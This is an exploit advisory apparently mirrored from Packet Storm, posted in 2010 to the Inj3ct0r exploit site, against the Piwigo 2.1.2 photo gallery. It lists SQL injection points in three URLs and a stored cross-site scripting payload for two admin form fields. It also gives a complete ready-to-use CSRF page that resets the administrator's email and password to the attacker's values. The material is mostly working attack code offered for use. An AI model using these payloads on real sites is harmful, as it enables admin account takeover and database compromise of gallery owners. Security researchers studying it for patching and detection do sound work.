Piwigo 2.1.2 Cross Site Request Forgery / Cross Site Scripting / SQL Injection

2010-09-11T00:00:00
ID PACKETSTORM:93741
Type packetstorm
Reporter Sweet
Modified 2010-09-11T00:00:00

Description

                                        
                                            `  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : Inj3ct0r.com 0  
1 [+] Support e-mail : submit[at]inj3ct0r.com 1  
0 0  
1 ###################################### 1  
0 Sweet the Algerian Haxxor 0  
1 ###################################### 0  
0 1  
1 [+]Exploit Title: piwigo-2.1.2 Multiple vulnerabilities 0  
0 [+]Date: 11/09/2010 1  
1 [+]Author: Sweet 0  
0 [+]Contact : charif38@hotmail.fr 0  
1 [+]Software Link: http://fr.piwigo.org 0  
0 [+]Download:http://fr.piwigo.org/releases/2.1.2 1  
1 [+]Version:2.1.2 0  
0 [+]Tested on: WinXp sp3 1  
1 [+]Risk : Hight 0  
0 [+]Description : Piwigo is a software for picture web gallerie 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
  
--=Sql injection=--  
  
  
http://www.target.com/path/comments.php?keyword=charif38@hotmail.fr&author=sweet&cat=1[SQLi]&since=1&sort_by=date&sort_order=DESC&items_number=5  
  
http://www.target.com/path/picture.php?1sweet[SQLi]&action=rate=0  
  
http://www.target.com/path/index.php?/search/10[SQli]  
  
  
--=Stored Xss=--  
  
Admin login required  
Attack pattern : >'<script>alert("Sweet")</script>  
  
http://www.target.com/path/admin.php?page=tags  
  
The POST variable "Nouveau tag" is vulnerable to a stored xss attack  
  
http://www.target.com/path/admin.php?page=cat_list  
  
The POST variable "Ajouter une catégorie virtuelle" is vulnerable to a stored xss attack  
  
  
  
--=CSRF=--  
Change admin password exploit  
  
<html>  
<body>  
<h1>Piwigo-2.1.2 Change admin password CSRF </h1>  
<form method="POST" name="form0" action="http://www.target.com/path/admin.php?page=profile&user_id=1">  
<input type="hidden" name="redirect" value="admin.php?page"/>  
<input type="hidden" name="mail_address" value="charif38@hotmail.fr"/> <!-- Your email here -->  
<input type="hidden" name="use_new_pwd" value="sweet"/> <!-- Your password here -->  
<input type="hidden" name="passwordConf" value="sweet"/> <!-- Your password here -->  
<input type="hidden" name="nb_image_line" value="5"/>  
<input type="hidden" name="nb_line_page" value="3"/>  
<input type="hidden" name="theme" value="Sylvia"/>  
<input type="hidden" name="language" value="fr_FR"/>  
<input type="hidden" name="recent_period" value="7"/>  
<input type="hidden" name="expand" value="false"/>  
<input type="hidden" name="show_nb_comments" value="false"/>  
<input type="hidden" name="show_nb_hits" value="false"/>  
<input type="hidden" name="maxwidth" value=""/>  
<input type="hidden" name="maxheight" value=""/>  
<p> Push the Button <input type="submit" name="validate" value="Valider"/> </p>  
</form>  
<form method="GET" name="form1" action="http://www.target.com/path/admin.php?page=user_list">  
<input type="hidden" name="name" value="value"/>   
</form>  
</body>  
</html>  
  
  
[ thx and RIP to Milw0rm.com , JF - Hamst0r - Keystroke you always be right here 3> ] , inj3ct0r.com , exploit-db.com  
  
  
1,2,3 VIVA LALGERIE  
  
`